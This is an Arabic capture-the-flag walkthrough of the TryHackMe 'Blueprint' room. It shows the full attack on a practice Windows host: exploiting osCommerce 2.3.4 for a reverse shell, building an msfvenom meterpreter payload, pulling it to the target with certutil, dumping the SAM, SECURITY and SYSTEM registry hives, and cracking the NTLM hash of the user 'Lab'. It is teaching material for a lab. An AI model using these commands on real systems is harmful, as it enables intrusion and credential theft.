TryHackMe|Blueprint WriteUp\Walkthrough (Arabic)

بسم الله

للي يبغى يشوف الحل مشروح فيديو يرجع للفيديو على قناتي باليوتيوب على هذا الرابط:

رابط التحدي: https://tryhackme.com/r/room/blueprint

===========================================================

كلمة IP في كل الكوماندز اللي أكتبها تُستبدل بالـIP للمشين حقتكم على TryHackMe

أول حاجة نشغل الـmachine ونتأكد إننا اتصلنا بشبكة TryHackMe والاتصال مضبوط، بعدين نبدأ بأول خطوة للحل وهي إننا نسوي scan للشبكة باستخدام nmap

sudo nmap IP -vv

طلع معانا عدد كبير من البورتات، لكن بنترك البورتات اللي أرقامها كبيرة وبنركز على أول 7 بورتات، فنرجع نسوي Aggressive سكان عليها

sudo nmap IP -vv -A -p 80,135,139,443,445,3306,8080

من خلال السكان عرفنا إن عندنا على بورت 8080 صفحة Index of 

نروح نزور الصفحة ونشوف الملفات اللي بداخلها، إذا رحنا للمتصفح على http://IP:8080 بنلاقي مجلد oscommerce-2.3.4 إذا ضغطنا عليه بيودينا على صفحة فيها مجلدين، نضغط على catalog وبيفتح معانا موقع تجارة إلكترونية ولكن أبدا مو مرتب وتعبان جدا، هذا يعطي احتمال إن هذه النسخة من هذا الموقع قديمة وعلى الغالب تم اختراقها وموجود لها exploit جاهزة، وعشان نعرف إذا في أو لا، نبحث باستخدام searchsploit

searchsploit oscommerce 2.3.4

طلع معانا أكثر من وحدة، بنستخدم 44374، وعشان ننسخها على المجلد الحالي 

searchsploit -m 44374

وبيتحمل معاكم ملف اسمه 

44374.py

على المجلد الحالي. 

هذه الاكسبوليت لو جربتوا تشغلونها زي ماهي بتطلع معاكم أخطاء كثيرة وبتتعبكم، لكن أنا هنا وضحت بس طريقة البحث وكيف نستفيد من رقم النسخة إذا كان موجود ونبحث عن أي ثغرات، هذه مع التجربة ما بتشتغل زين، على هذا الرابط بتلاقون الاكسبلويت بدون أخطاء وبتشتغل معاكم تمام بإذن الله. فناخذها وننسخها ونخزنها عندنا في ملف اسمه exploit.py. وهذا الكود يحتاج تعديل الـIP والروابط

هنا نعدل ونحط عنوان التارقيت

بعد التعديل:

ونعدل برضو عنوان جهازنا 

بعد التعديل:

أنا هنا برضو عدلت رقم البورت، مو ضروري ممكن تخلونه زي ماهو، المهم إنكم تتأكدون إن الـlistener يكون نفس رقم البورت.

بعديل نشغلها 

python3 exploit.py

وبيعطينا رابط، مجرد ما نزور هذا الرابط بيرسل التارقيت على جهازنا اتصال، لذلك لازم نجهز الـlistener قبل نروح على الرابط

nc -nlvp 4444

ثم نروح على الرابط من المتصفح وبكذا بيجينا اتصال من التارقيت ونحصل على shell

whoami 

طلع معانا إن احنا دخلنا على نظام الويندوز كأعلى صلاحيات وهي الـNT authority\system

اللي يبغاه مننا في هذا التحدي هو الهاش للمستخدم Lab، وعشان نقدر نطلع الهاش ممكن نستخدم metasploit، وممكن 3 hives وكلها بأوريكم كيف، بنبدأ أول شيء باستخدام metasploit. 

في طريقة برضو أخرى نقدر نسويها وهي من خلال إننا نستخدم mimikatz، وننقله للتارقيت باستخدام بايثون سيرفير، ثم نشغله ونستخرج الهاشيز، وشرحت كيف نشغل mimikatz ونستخرج الهاشيز بالتفصيل في تحدي Atlas الموجود على المدونة، اللي حاب يستفيد يرجع له. 

نرجع لـmetasploit

أو خطوة هي إننا نسوي payload باستخدام msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=OpenVPN-IP LPORT=1234 -f exe -o revshell.exe

لازم نتأكد إن رقم البورت يكون مختلف عن رقم البورت اللي استخدمناه عشان نستقبل الاتصال من الضحية، هناك استخدمت 4444، وهنا استخدمت 1234، لما يخلص تنفيذ الكوماند بيصير عندنا ملف تنفيذي اسمه revshell.exe

لما يجهز الملف ننقله للضحية باستخدام بايثون سيرفير، ونشغل السيرفير في المجلد اللي يحتوي على revshell.exe

python3 -m http.server

وعلى جهاز الضحية 

certutil -urlcache -f  http://OpenVPN-IP:8000/revshell.exe revshell.exe

الملف الحين محمل جهاز على جهاز الضحية، باقي بس نشغله، فقط بكتابة اسمه بيشتغل

revshell.exe

لكن قبل نشغله، نروح على metasploit ونجهز الـmulti/handler

msfconsole -1

use exploit/multi/handler

set lhost tun0

tun0 تُشير إلى الـinterface المرتبطة باتصال VPN

set payload windows/meterpreter/reverse_tcp

set lport 1234

 نتأكد إن البورت هي نفسها اللي حطيناها لما سوينا الـpayload، والحين كذا كل شيء جاهز نسوي run ونرجع على التارقيت ونشغل الملف revshell.exe وبكذا بنستلم meterpreter session على ميتاسبلويت. 

بنحصل على shell بصلاحيات NT authority\system وعشان نطلع الهاشيز بس نكتب hashdump، كذا انتهينا. 

-------------------------------------------------------------------

الطريقة الثانية هي باستخدام The 3 Hives

بنحتاج نستخدم secretsdump.py وتحملونه من هنا 

اللي نحتاجه أول شيء هو إننا نحمل على جهازنا 3 ملفات من الضحية، وهي 

sam.save, security.save, system,save

وفي طريقة سهلة، مو احنا عندنا وصول على البورت رقم 8080 واللي تحتوي على index of، فاللي بنسويه إننا من الضحية بنرفع الملفات على صفحة الويب الموجودة على بورت 8080، ثم من جهازنا نفتح المتصفح ونحمل هذه ال3 ملفات عشان نقدر نستخدم secretsdump.py ونستخرج الهاشيز. ننفذ هذه الكوماندز الثلاثة على الـVictim

reg.exe save hklm\sam C:\xampp\htdocs\oscommerce-2.3.4\sam.save
reg.exe save hklm\security C:\xampp\htdocs\oscommerce-2.3.4\security.save
reg.exe save hklm\system C:\xampp\htdocs\oscommerce-2.3.4\system.save

وبعد ما تتنفذ كلها، نروح على المتصفح على الصفحة الموجودة على بورت 8080 في الضحية، ثم نضغط على oscommerce وبيتفح معانا صفحة ثانية، فيها ملفات من ضمنها الملفات اللي تو رفعناها

ناخذ هذه الملفات ونحملها على جهازنا، بعد ما تتحمل نروح على المجلد اللي يحتوي على هذه الملفات في جهازنا، باستخدام الـterminal ثم نشغل هذه الكوماند

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

وبيطبع معانا الهاشيز

في الأسئلة طالب فك الهاش عن اليوز Lab، ناخذ فقط قيمة NTLM وليس LM، وكيف نميز، هي كذا تجي مرتبة الهاشيز في أنظمة الويندوز

Username:ID:LM hash:NTLM hash:::

إذن ناخذ ثاني تسلسل للأرقام وليس أول واحد

نستخدم موقع crackstation وبيطبع معانا إجابة السؤال. 

باقي نبغى الـroot.txt وهو عادة يكون في الـadministrator desktop

cd c\\Users\\Administrator\\Desktop

type root.txt.txt

وبكذا حصلنا على آخر فلاق وانتهينا من الحل ✨

ملاحظة: لو بحثتوا في metasploit بتلاقون exploit للـoscommerce ولكن لو استخدمتوها واشتغلت وأعطتكم meterpreter session ما بتقدرون تستخدمونها عشان تطلعون الهاشيز، لأن الصلاحيات ما بتكون كافية. 

ويعطيكم العافية والله يوفقنا جميعًا.